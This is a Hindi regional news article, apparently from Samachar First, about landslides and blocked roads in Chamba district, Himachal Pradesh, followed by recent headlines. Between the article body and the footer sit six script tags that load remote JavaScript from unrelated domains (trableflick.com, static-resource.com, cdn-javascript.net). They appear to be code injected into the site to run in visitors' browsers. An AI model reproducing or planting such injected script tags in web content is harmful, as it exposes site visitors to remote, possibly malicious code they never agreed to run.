Categories: हिमाचल

चंबा में भारी बारिश के बाद कुदरत ने बरपाया अपना कहर, दरकी पहाड़ी

<p>प्रदेश के चंबा जिला में भारी बारिश के बाद कुदरत अपना कहर बरपाने में कोई कमी नहीं छोड़ रही है। जगह-जगह मार्ग अवरुद्ध होने से लोगों की परेशानी बढ़ती जा रही है। सर्दी के इस मौसम में जहां एक तरफ सर्दी ने लोगों का जीना दुश्वार कर दिया है। वहीं, दूसरी तरफ पहाड़ तोड़ प्रहार लगातार देखने को मिल रहा है। चंबा जिला में पिछले 2 दिनों से पहाड़ टूटने की घटनाएं सामने आ रही है। पिछले कल तीसा&nbsp; में पहाड़&nbsp; टूटने से जहां मार्ग बंद हो गया उसी के चलते आज चंबा होली मार्ग पूरी तरह से ठप हो गया है बताया जा रहा है कि चंबा होली मार्ग भारी बारिश के बाद पहाड़ टूटने से अवरुद्ध हो गया है।</p>

<p>जब पहाड़ पर यह हरकत होने लगी कि पहाड़ टूट सकता है। लोगों ने खतरे को भांपते हुए सावधानी बरतना ही बेहतर समझा वहां से गुजर रहे सैंकड़ों वाहनों ने पहले ही अपने आप को किनारे लगा लिया। ताकि कोई नुकसान ना हो सके कुदरत के प्रहार से&nbsp; लोग परेशान हैं। यह पहला मौका नहीं है जब इस तरह के पहाड़ टूटने की घटनाएं सामने आई है। लेकिन चंबा जिला में पिछले 3 दिनों से हो रही भारी बारिश और बर्फबारी के बाद हालत काफी बिगड़ने लगे हैं।</p>

<p>जहां एक तरफ लैंडस्लाइड ने पिछले 1 सप्ताह में करीब 5 लोगों को मौत के घाट&nbsp; उतारा है, तो वहीं दूसरी तरफ कई मार्ग अवरुद्ध करने का काम भी किया है। चंबा जिले में भारी बर्फबारी और बारिश ने&nbsp; लोगों का जीना दुश्वार करने का काम किया है। कोई ऐसा दिन नहीं जहां लैंड स्लाइड की&nbsp; घटना सामने नहीं आ रही है। फिलहाल, प्रशासन के दावे खोखले साबित होते हुए दिख रहे हैं। सर्दी का मौसम है और हिमाचल प्रदेश में प्रशासन को अलर्ट पर रहने के लिए कहा गया है। लेकिन इस तरह की घटनाएं सामने आने से प्रशासन की कार्यप्रणाली पर भी सवाल खड़े होते हैं।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_458816028&amp;key=21aca573d498d25317&amp;cv=1579319367&amp;t=1579319367424″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_354224202&amp;key=21aca573d498d25317&amp;cv=51909&amp;t=1579319367426″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1579319367429″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

भारत में सड़क दुर्घटनाओं को रोकने के लिए केंद्रीय कानून जरूरी: शांता कुमार

Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…

2 hours ago

Himachal: सीएम सुक्खू ने ईवीएम पर उठाए सवाल, बैलेट पेपर से चुनाव की मांग

Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…

3 hours ago

Sirmour News : तेज रफ्तार गाड़ी की टक्कर से 26 वर्षीय युवती की मौत

Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…

3 hours ago

Baba Siddique murder: बाबा सिद्दीकी सुपुर्द-ए-खाक, लॉरेंस गैंग की सलमान खान को भी नहीं छोड़ेंगे की धमकी

Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…

3 hours ago

Himachal: रथयात्रा के साथ कुल्लू दशहरा उत्सव की भव्य शुरुआत

Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…

4 hours ago

Himachal: भगवान रघुनाथ की भव्य शोभायात्रा के साथ आज शुरू होगा दशहरा

International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…

12 hours ago